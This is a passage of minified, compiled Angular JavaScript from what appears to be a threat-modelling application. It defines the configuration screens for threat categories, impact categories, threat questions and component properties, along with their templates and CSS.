5px",4,"ngIf"],[2,"margin-left","auto","margin-right","5px"],[2,"margin","10px"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matInput","","type","text",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"value"],[")","",4,"ngIf"],[")",""],["mat-raised-button","",3,"click"],[2,"margin-top","10px"],["appearance","fill","class","property-form-field",4,"ngIf"],["multiple","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[3,"node","threatRule","canEdit","canEditName"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-line","",4,"ngIf"],[1,"prop-list","reorder-list"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"disabled","matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip",4,"ngIf"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],["matTooltipShowDelay","1000",3,"matTooltip"],[3,"selectedTypeTemplate"],["matInput","","type","text","matTooltip","selectedProperty.DisplayName","matTooltipShowDelay","1000",3,"spellcheck","ngModel","ngModelChange"],["style","padding-left: 60px;",4,"ngIf"],[2,"margin","10px 0 10px 10px"],[3,"value","valueChange"],[3,"label",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],[2,"padding-left","60px"],[4,"ngFor","ngForOf"],["color","primary",3,"checked","change"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(ne(0,Nht,19,8,"div",0),s(1,"\n"),it(2,"div",1,2),s(4," \n"),m(5,"mat-menu",null,3),s(7," \n  "),ne(8,Wht,3,1,"ng-template",4),s(9," \n"),u(),s(10," ")),2&e){const n=Ti(6);V("ngIf",i.selectedNode),C(2),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,Rd,Sd,oa,br,da,nn,un,jr,Nr,yr,Cg,qh,Mu,Uh,Go,Xa,es,ts,Or,Lr,rc,_p,Xo,qo,po,Zc,Pa,Gp,Mut,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();function Vht(t,a){if(1&t){const e=Ye();m(0,"table",4),s(1,"\n      "),m(2,"tr")(3,"td")(4,"mat-checkbox",5),he("change",function(){const r=be(e).$implicit,c=B();return Me(c.ImpactCatChanged(c.threatCat,r))}),s(5),oe(6,"translate"),u()()(),s(7,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();C(4),V("checked",i.threatCat.ImpactCats.includes(e)),C(1),ke(re(6,2,i.GetImpactCategoryName(e)))}}let Bht=(()=>{class t{constructor(e){this.dataService=e,this.canEdit=!0}ngOnInit(){}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-category"]],inputs:{threatCat:"threatCat",canEdit:"canEdit"},decls:20,vars:11,consts:[["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[2,"margin-top","10px","display","flex","flex-wrap","wrap"],["style","min-width: 200px;",4,"ngFor","ngForOf"],[2,"min-width","200px"],["color","primary",3,"checked","change"]],template:function(e,i){1&e&&(m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",0),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"textarea",1),he("ngModelChange",function(r){return i.threatCat.Description=r}),u(),s(9,"\n  "),u(),s(10,"\n  "),m(11,"h3"),s(12),oe(13,"translate"),u(),s(14,"\n  "),m(15,"div",2),s(16,"\n    "),ne(17,Vht,8,4,"table",3),s(18,"\n  "),u(),s(19,"\n"),u()),2&e&&(Ct("disable",!i.canEdit),C(5),ke(re(6,7,"properties.Description")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatCat.Description),C(4),ke(re(13,9,"properties.ImpactCategories")),C(5),V("ngForOf",i.GetImpactCategories()))},dependencies:[Zi,an,Ta,Ea,br,nn,un,Go,Xa,Xi],styles:[".disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();function Hht(t,a){if(1&t&&(m(0,"th",9),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);C(1),ke(re(2,1,i.GetImpactCategoryName(e)))}}function Uht(t,a){if(1&t){const e=Ye();m(0,"td",11)(1,"mat-checkbox",12),he("change",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).ImpactCatChanged(c,r))}),u()()}if(2&t){const e=a.$implicit,i=B().$implicit;C(1),V("checked",i.ImpactCats.includes(e))}}function qht(t,a){if(1&t&&(m(0,"tr"),s(1,"\n        "),m(2,"td"),s(3),u(),s(4,"\n        "),ne(5,Uht,2,1,"td",10),s(6,"\n      "),u()),2&t){const e=a.$implicit,i=B(3);C(3),ke(e.Name),C(2),V("ngForOf",i.GetImpactCategories())}}function Ght(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",4),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(B(2).selectedThreatCatGroup.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"table",6),s(12,"\n      "),m(13,"tr"),s(14,"\n        "),m(15,"th"),s(16),oe(17,"translate"),u(),s(18,"\n        "),ne(19,Hht,3,3,"th",7),s(20,"\n      "),u(),s(21,"\n      "),ne(22,qht,7,2,"tr",8),s(23,"\n    "),u(),s(24,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,6,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedThreatCatGroup.Description),C(8),ke(re(17,8,"pages.config.ThreatCategory")),C(3),V("ngForOf",e.GetImpactCategories()),C(3),V("ngForOf",e.selectedThreatCatGroup.ThreatCategories)}}function jht(t,a){1&t&&it(0,"app-threat-category",13),2&t&&V("threatCat",B(2).selectedThreatCat)}function Qht(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,Ght,25,10,"ng-container",2),s(6,"\n  "),ne(7,jht,1,1,"app-threat-category",3),s(8,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedThreatCatGroup),C(2),V("ngIf",e.selectedThreatCat)}}let $ht=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedThreatCatGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Zb?this.selectedNode.data:null}get selectedThreatCat(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Jb?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(c,d,T,k)=>{let q={name:()=>c.Name,canSelect:!0,data:c,canRename:!0,onRename:Y=>{c.Name=Y},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(Y=>{Y&&(this.dataService.Config.DeleteThreatCategory(c),this.selectedNode==q&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Y=this.dataService.Config.CreateThreatCategory();Y.CopyFrom(c.Data),Y.Name=Y.Name+"-Copy",this.dataService.Config.GetThreatCategoryGroups().find(te=>te.ThreatCategories.includes(c)).AddThreatCategory(Y),this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Y=d.Data.threatCategorieIDs;if(0!=Y.findIndex(te=>te==c.ID)){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te-1,1)[0]),T.children.splice(te,0,T.children.splice(te-1,1)[0])}},onMoveDown:()=>{let Y=d.Data.threatCategorieIDs;if(Y.findIndex(te=>te==c.ID)!=Y.length-1){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te+1,1)[0]),T.children.splice(te,0,T.children.splice(te+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>k.children.filter(Y=>Y!=T),onMoveToGroup:Y=>{let te="threatCategorieIDs";d.Data[te].splice(d.Data[te].indexOf(c.ID),1),Y.data.Data[te].push(c.ID),this.createNodes()}};return q},n=c=>{let d={name:()=>c.Name,canSelect:!0,data:c,canAdd:!0,onAdd:()=>{let T=this.dataService.Config.CreateThreatCategory();c.AddThreatCategory(T),this.createNodes(),this.selectedNode=this.FindNodeOfObject(T),this.selectedNode.isRenaming=!0},canRename:!0,onRename:T=>{c.Name=T},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(T=>{T&&(this.dataService.Config.DeleteThreatCategoryGroup(c),this.selectedNode==d&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let T=this.dataService.Config.GetThreatCategoryGroups();if(0!=T.findIndex(k=>k.ID==c.ID)){let k=T.findIndex(q=>q.ID==c.ID);T.splice(k,0,T.splice(k-1,1)[0]),r.children.splice(k,0,r.children.splice(k-1,1)[0])}},onMoveDown:()=>{let T=this.dataService.Config.GetThreatCategoryGroups();if(T.findIndex(k=>k.ID==c.ID)!=T.length-1){let k=T.findIndex(q=>q.ID==c.ID);T.splice(k,0,T.splice(k+1,1)[0]),r.children.splice(k,0,r.children.splice(k+1,1)[0])}}};return d},r={name:()=>this.translate.instant("pages.config.threatcategories.ThreatCategoryGroups"),canSelect:!1,canAdd:!0,hasMenu:!0,icon:"flash_on",onAdd:()=>{let c=this.dataService.Config.CreateThreatCategoryGroup();this.createNodes(),this.selectedNode=this.FindNodeOfObject(c),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config.GetThreatCategoryGroups().forEach(c=>{let d=n(c);c.ThreatCategories.forEach(T=>d.children.push(i(T,c,d,r))),r.children.push(d)}),this.Nodes.push(r),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-categories"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"threatCat",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[2,"margin-top","10px"],["style","padding: 0 3px 0 3px",4,"ngFor","ngForOf"],[4,"ngFor","ngForOf"],[2,"padding","0 3px 0 3px"],["style","text-align: center;",4,"ngFor","ngForOf"],[2,"text-align","center"],["color","primary",3,"checked","change"],[3,"threatCat"]],template:function(e,i){1&e&&ne(0,Qht,9,3,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Zi,Ri,an,Ta,Ea,br,nn,un,Go,Xa,Bht,Xi]}),t})();function Kht(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(B().threatQuestion.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Xht(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.DisplayName)}}function Yht(t,a){if(1&t&&(m(0,"mat-option",15),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B();V("value",e),C(1),ke(re(2,2,i.GetOptionTypeName(e)))}}function Jht(t,a){if(1&t&&(m(0,"div",18),s(1),u()),2&t){const e=B().$implicit,i=B();C(1),ct("Property set to ",i.threatQuestion.ChangesPerOption[e.Key].Value,"")}}function Zht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",16),he("click",function(){const r=be(e).$implicit;return Me(B().selectedOption=r)}),s(1,"\n          "),m(2,"mat-icon",17),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",18),s(6),oe(7,"translate"),u(),s(8,"\n          "),ne(9,Jht,2,1,"div",19),s(10,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.IsOptionSelected(e)&&!i.theme.IsDarkMode)("highlight-dark",i.IsOptionSelected(e)&&i.theme.IsDarkMode),C(2),ri("visibility",null!=i.threatQuestion.ChangesPerOption[e.Key]&&i.threatQuestion.ChangesPerOption[e.Key].Active?"visible":"hidden"),C(4),ke(re(7,8,e.Key)),C(3),V("ngIf",i.threatQuestion.Property&&1==(null==i.threatQuestion.ChangesPerOption[e.Key]?null:i.threatQuestion.ChangesPerOption[e.Key].Active))}}function eft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n        "),m(2,"mat-checkbox",20),he("ngModelChange",function(n){be(e);const r=B();return Me(r.threatQuestion.ChangesPerOption[r.selectedOption.Key].Active=n)}),s(3),oe(4,"translate"),u(),s(5,"\n        "),it(6,"br"),s(7,"\n        Set "),m(8,"i"),s(9),u(),s(10," to "),m(11,"mat-checkbox",21),he("ngModelChange",function(n){be(e);const r=B();return Me(r.threatQuestion.ChangesPerOption[r.selectedOption.Key].Value=n)}),u(),s(12,"\n      "),Mt()}if(2&t){const e=B();C(2),V("ngModel",e.threatQuestion.ChangesPerOption[e.selectedOption.Key].Active),C(1),ke(re(4,5,"pages.config.threatquestion.setProperty")),C(6),ke(e.threatQuestion.Property.DisplayName),C(2),V("disabled",!(null!=e.threatQuestion.ChangesPerOption[e.selectedOption.Key]&&e.threatQuestion.ChangesPerOption[e.selectedOption.Key].Active))("ngModel",e.threatQuestion.ChangesPerOption[e.selectedOption.Key].Value)}}let EZ=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.dialog=n,this.canEdit=!0,this.showAttackVector=!0}get threatQuestion(){return this._threatQuestion}set threatQuestion(e){this._threatQuestion=e,this.selectedOption=null}ngOnInit(){}GetProperties(){return this.threatQuestion.ComponentType.Properties}GetOptionTypes(){return Pl.GetTypes()}GetOptionTypeName(e){return Pl.ToString(e)}GetOptionValues(e){return Pl.GetOptions(e)}IsOptionSelected(e){return null!=this.selectedOption&&e.Key==this.selectedOption.Key}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-question"]],inputs:{canEdit:"canEdit",showAttackVector:"showAttackVector",threatQuestion:"threatQuestion"},decls:85,vars:44,consts:[["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","type","text",3,"spellcheck","ngModel","ngModelChange"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],[1,"optionColumn1"],[1,"prop-list"],["mat-subheader",""],[3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],[1,"optionColumn2"],[4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"value"],[3,"click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-line","","style","pointer-events: initial;",4,"ngIf"],["color","primary","labelPosition","before",3,"ngModel","ngModelChange"],["color","primary",3,"disabled","ngModel","ngModelChange"]],template:function(e,i){1&e&&(m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",0),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",1),he("ngModelChange",function(r){return i.threatQuestion.Name=r}),u(),s(9,"\n    "),ne(10,Kht,6,3,"button",2),s(11,"\n  "),u(),s(12,"\n  "),it(13,"br"),s(14,"\n  "),m(15,"mat-form-field",3),s(16,"\n    "),m(17,"mat-label"),s(18),oe(19,"translate"),u(),s(20,"\n    "),m(21,"input",4),he("ngModelChange",function(r){return i.threatQuestion.Question=r}),u(),s(22,"\n  "),u(),s(23,"\n  "),it(24,"br"),s(25,"\n  "),m(26,"mat-form-field",3),s(27,"\n    "),m(28,"mat-label"),s(29),oe(30,"translate"),u(),s(31,"\n    "),m(32,"textarea",5),he("ngModelChange",function(r){return i.threatQuestion.Description=r}),u(),s(33,"\n  "),u(),s(34,"\n  "),it(35,"br"),s(36,"\n  "),m(37,"mat-form-field",0),s(38,"\n    "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n    "),m(43,"mat-select",6),he("valueChange",function(r){return i.threatQuestion.Property=r}),oe(44,"translate"),s(45,"\n      "),ne(46,Xht,2,2,"mat-option",7),s(47,"\n    "),u(),s(48,"\n  "),u(),s(49,"\n  "),it(50,"br"),s(51,"\n  "),m(52,"mat-form-field",0),s(53,"\n    "),m(54,"mat-label"),s(55),oe(56,"translate"),u(),s(57,"\n    "),m(58,"mat-select",6),he("valueChange",function(r){return i.threatQuestion.OptionType=r}),oe(59,"translate"),s(60,"\n      "),ne(61,Yht,3,4,"mat-option",7),s(62,"\n    "),u(),s(63,"\n  "),u(),s(64,"\n  "),m(65,"div"),s(66,"\n    "),m(67,"div",8),s(68,"\n      "),m(69,"mat-list",9),s(70,"\n        "),m(71,"div",10),s(72),oe(73,"translate"),u(),s(74,"\n        "),ne(75,Zht,11,10,"mat-list-item",11),s(76,"\n      "),u(),s(77,"\n    "),u(),s(78,"\n    "),m(79,"div",12),s(80,"\n      "),ne(81,eft,13,7,"ng-container",13),s(82,"\n    "),u(),s(83,"\n  "),u(),s(84,"\n"),u()),2&e&&(Ct("disable",!i.canEdit),C(5),ke(re(6,28,"properties.QuestionName")),C(3),at("matTooltip",i.threatQuestion.Name),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatQuestion.Name),C(2),V("ngIf",i.threatQuestion.Name),C(8),ke(re(19,30,"properties.Question")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatQuestion.Question),C(8),ke(re(30,32,"properties.Description")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatQuestion.Description),C(8),ke(re(41,34,"general.Property")),C(3),at("matTooltip",re(44,36,null==i.threatQuestion.Property?null:i.threatQuestion.Property.Tooltip)),V("value",i.threatQuestion.Property),C(3),V("ngForOf",i.GetProperties()),C(9),ke(re(56,38,"properties.OptionType")),C(3),at("matTooltip",re(59,40,i.GetOptionTypeName(i.threatQuestion.OptionType))),V("value",i.threatQuestion.OptionType),C(3),V("ngForOf",i.GetOptionTypes()),C(8),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ke(re(73,42,"properties.ChangesPerOption")),C(3),V("ngForOf",i.GetOptionValues(i.threatQuestion.OptionType)),C(6),V("ngIf",i.threatQuestion&&i.selectedOption&&i.threatQuestion.Property))},dependencies:[Zi,Ri,an,Ta,Ea,oa,br,da,nn,un,jr,Nr,yr,Go,Xa,es,ts,Or,Lr,rc,Pa,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.optionColumn1[_ngcontent-%COMP%]{float:left;width:300px}.optionColumn2[_ngcontent-%COMP%]{float:left;width:calc(100% - 310px);padding-left:10px}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();const tft=["ctxMenu"];function ift(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",21),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedProperty=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(4).OpenContextMenu(n,c))}),oe(1,"translate"),s(2,"\n                    "),m(3,"mat-icon",22),s(4,"arrow_right"),u(),s(5,"\n                    "),m(6,"div",23),s(7),oe(8,"translate"),u(),s(9,"\n                    "),m(10,"div",23),s(11),u(),s(12,"\n                    "),m(13,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteProperty(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,8,e.DisplayName)),C(7),ke(re(8,10,e.DisplayName)),C(4),ke(e.Type),C(2),at("matTooltip",re(14,12,"general.Delete"))}}function aft(t,a){if(1&t){const e=Ye();m(0,"button",32),he("click",function(){return be(e),Me(B(5).selectedProperty.DisplayName="")}),oe(1,"translate"),s(2,"\n                        "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                      "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function nft(t,a){if(1&t&&(m(0,"mat-option",33),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e)}}function oft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                  "),m(2,"div",25),s(3,"\n                    "),m(4,"mat-form-field",26),s(5,"\n                      "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n                      "),m(10,"input",27),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.DisplayName=n)}),u(),s(11,"\n                      "),ne(12,aft,6,3,"button",28),s(13,"\n                    "),u(),s(14,"\n                    "),it(15,"br"),s(16,"\n                    "),m(17,"mat-form-field",26),s(18,"\n                      "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n                      "),m(23,"mat-select",29),he("valueChange",function(n){return be(e),Me(B(4).selectedProperty.Type=n)}),s(24,"\n                        "),ne(25,nft,2,2,"mat-option",30),s(26,"\n                      "),u(),s(27,"\n                    "),u(),s(28,"\n                    "),it(29,"br"),s(30,"\n                    "),m(31,"mat-form-field",7),s(32,"\n                      "),m(33,"mat-label"),s(34),oe(35,"translate"),u(),s(36,"\n                      "),m(37,"input",31),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.Tooltip=n)}),u(),s(38,"\n                    "),u(),s(39,"\n                    "),s(40,"\n                  "),u(),s(41,"\n                "),Mt()}if(2&t){const e=B(4);C(7),ke(re(8,12,"general.PropertyName")),C(3),at("matTooltip",e.selectedProperty.DisplayName),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.DisplayName),C(2),V("ngIf",e.selectedProperty.DisplayName),C(8),ke(re(21,14,"general.Type")),C(3),at("matTooltip",e.selectedProperty.Type),V("value",e.selectedProperty.Type),C(2),V("ngForOf",e.GetPropertyTypes()),C(9),ke(re(35,16,"general.Tooltip")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.Tooltip)}}function rft(t,a){if(1&t){const e=Ye();s(0,"\n            "),m(1,"div",14),s(2,"\n              "),m(3,"div",15),s(4,"\n                "),m(5,"mat-list",16),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.drop(n,r.selectedComponentType.Properties))}),s(6,"\n                  "),m(7,"div",17),s(8),oe(9,"translate"),m(10,"button",18),he("click",function(){return be(e),Me(B(3).AddProperty())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                  "),ne(15,ift,18,14,"mat-list-item",19),s(16,"\n                "),u(),s(17,"\n              "),u(),s(18,"\n              "),m(19,"div",20),s(20,"\n                "),ne(21,oft,42,18,"ng-container",6),s(22,"\n              "),u(),s(23,"\n            "),u(),s(24,"\n          ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedComponentType.Name," ",re(9,9,"general.Properties")," "),C(2),at("matTooltip",re(11,11,"general.Add")),C(5),V("ngForOf",e.selectedComponentType.Properties),C(6),V("ngIf",null==e.selectedComponentType.Properties?null:e.selectedComponentType.Properties.includes(e.selectedProperty))}}function sft(t,a){1&t&&(m(0,"div",23),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(C(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function cft(t,a){if(1&t&&(m(0,"div",23),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit,i=B(4);C(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetComponentRestrictionsCount(e),"")}}function lft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",21),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedThreatRule=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(4).OpenContextMenu(n,c))}),s(1,"\n                  "),m(2,"mat-icon",22),s(3,"arrow_right"),u(),s(4,"\n                  "),m(5,"div",23),s(6),u(),s(7,"\n                  "),ne(8,sft,4,6,"div",35),s(9,"\n                  "),ne(10,cft,3,4,"div",35),s(11,"\n                  "),m(12,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteThreat(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"delete"),u()(),s(16,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),V("ngIf",0==i.GetComponentRestrictionsCount(e)),C(2),V("ngIf",i.GetComponentRestrictionsCount(e)>0),C(2),at("matTooltip",re(13,9,"general.Delete"))}}function dft(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",14),s(2,"\n            "),m(3,"div",15),s(4,"\n              